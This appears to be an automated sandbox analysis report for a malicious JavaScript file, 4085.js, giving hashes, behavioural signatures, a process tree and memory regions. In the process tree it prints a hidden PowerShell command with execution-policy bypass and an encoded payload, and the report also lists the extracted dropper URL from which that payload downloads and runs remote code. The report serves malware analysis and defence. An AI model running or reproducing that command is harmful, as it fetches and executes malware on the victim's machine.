Analysis
-
max time kernel
11s -
max time network
41s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
10-08-2021 06:44
Static task
static1
Behavioral task
behavioral1
Sample
4085.js
Resource
win7v20210410
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
4085.js
Resource
win10v20210408
windows10_x64
0 signatures
0 seconds
General
-
Target
4085.js
-
Size
776KB
-
MD5
b6e9c6f1113c92ad6757266ae75769a2
-
SHA1
9190e8d268db4deb7cd97624b17cba6617244699
-
SHA256
9fca4b9bb2238dec26fc6b6161dc9d62647883966f1cfd661537fb8c097ff4fe
-
SHA512
1684c2350b540da9326159455cb57937a2fefc1b97f1231c12cc66ffa601f71ce52096d5c37737d644c49b1c9ae7b5e33eb86890b1405a79d2aa364afbc1f09b
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 768 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 768 powershell.exe 768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 768 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
wscript.execmd.exedescription pid process target process PID 1096 wrote to memory of 1652 1096 wscript.exe cmd.exe PID 1096 wrote to memory of 1652 1096 wscript.exe cmd.exe PID 1096 wrote to memory of 1652 1096 wscript.exe cmd.exe PID 1652 wrote to memory of 768 1652 cmd.exe powershell.exe PID 1652 wrote to memory of 768 1652 cmd.exe powershell.exe PID 1652 wrote to memory of 768 1652 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\4085.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/768-60-0x0000000000000000-mapping.dmp
-
memory/768-61-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmpFilesize
8KB
-
memory/768-62-0x0000000002360000-0x0000000002361000-memory.dmpFilesize
4KB
-
memory/768-63-0x000000001AC80000-0x000000001AC81000-memory.dmpFilesize
4KB
-
memory/768-64-0x00000000023B0000-0x00000000023B1000-memory.dmpFilesize
4KB
-
memory/768-65-0x00000000024E0000-0x00000000024E1000-memory.dmpFilesize
4KB
-
memory/768-67-0x000000001AC04000-0x000000001AC06000-memory.dmpFilesize
8KB
-
memory/768-66-0x000000001AC00000-0x000000001AC02000-memory.dmpFilesize
8KB
-
memory/768-68-0x000000001C500000-0x000000001C501000-memory.dmpFilesize
4KB
-
memory/1652-59-0x0000000000000000-mapping.dmp